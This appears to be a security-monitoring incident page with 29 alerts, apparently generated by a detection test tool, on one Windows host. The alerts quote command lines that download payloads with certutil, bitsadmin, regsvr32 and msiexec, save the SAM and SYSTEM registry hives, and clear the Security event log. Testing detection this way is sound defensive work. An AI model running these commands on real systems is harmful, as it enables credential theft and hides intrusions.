Back to list

Incident Overview

Incident ID CINC-20251220-6BE2D11F
Severity Critical (90)
Status new
Alert Count 29
Host Count 1

Timeline

First Seen 2025-12-18 09:49:24
Last Seen 2025-12-18 20:01:51
Duration 0d 10h 12m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Rec... Ini... Exe... Per... Pri... Def... Cre... Dis... Lat... Col... Com... Exf... Imp...
Observed Tactics:
Command and Control Defense Evasion Credential Access Persistence Execution
Techniques:
Ingress Tool Transfer Regsvr32 OS Credential Dumping BITS Jobs Indicator Removal Event Triggered Execution User Execution

Affected Hosts (1)

BOOK-R0BE6S1NC3

Related Alerts (29)

Severity Status Hostname Description Tactic Command Line Time
High new BOOK-R0BE6S1NC3 Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\ubuntu\AppData\Local\Temp\cert.exe 12-18 20:01
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 20:01
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv 12-18 20:01
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 20:01
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv 12-18 10:11
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 10:11
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:11
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv 12-18 10:11
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv 12-18 10:07
High new BOOK-R0BE6S1NC3 Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\ubuntu\AppData\Local\Temp\cert.exe 12-18 10:07
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 10:07
High new BOOK-R0BE6S1NC3 A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 10:04
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 10:03
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv 12-18 10:03
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:03
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv 12-18 10:03
High new BOOK-R0BE6S1NC3 Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\ubuntu\AppData\Local\Temp\cert.exe 12-18 10:03
High new BOOK-R0BE6S1NC3 Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 10:00
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv 12-18 10:00
High new BOOK-R0BE6S1NC3 A regsvr32 process appears to be related to a Squiblydoo attempt. Squiblydoo uses regsvr32 to pass a malicious script to scrobj.dll and registers a com object. Review the script passed to scrobj.dll on the command line. Defense Evasion regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll 12-18 10:00
High new BOOK-R0BE6S1NC3 A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree. Defense Evasion wevtutil cl Security 12-18 10:00
High new BOOK-R0BE6S1NC3 Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Please review the installer package and any pre- or post-install actions. Persistence msiexec /q /i http://127.0.0.1/test.msi 12-18 09:56
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 09:56
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv 12-18 09:56
High new BOOK-R0BE6S1NC3 A process attempted to download a file using bitsadmin in an unusual way. The file might be a malicious payload. Investigate the process tree. Defense Evasion bitsadmin /transfer j http://127.0.0.1/t C:\Users\ubuntu\AppData\Local\Temp\b.exe 12-18 09:53
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SAM C:\Users\ubuntu\AppData\Local\Temp\sam.hiv 12-18 09:53
Critical new BOOK-R0BE6S1NC3 A process saved the Security Account Manager SAM or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree. Credential Access reg save HKLM\SYSTEM C:\Users\ubuntu\AppData\Local\Temp\sys.hiv 12-18 09:53
High new BOOK-R0BE6S1NC3 Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree. Command and Control certutil -urlcache -split -f http://127.0.0.1/test.exe C:\Users\ubuntu\AppData\Local\Temp\cert.exe 12-18 09:53
Informational new BOOK-R0BE6S1NC3 A process has written a known EICAR test file. Review the files written by the triggered process. Execution "C:\app\cortex-xdr-siem-test\xdr_tools\MegaGenerator\bin\publish\MegaGenerator.exe" --once --scenarios 15 12-18 09:49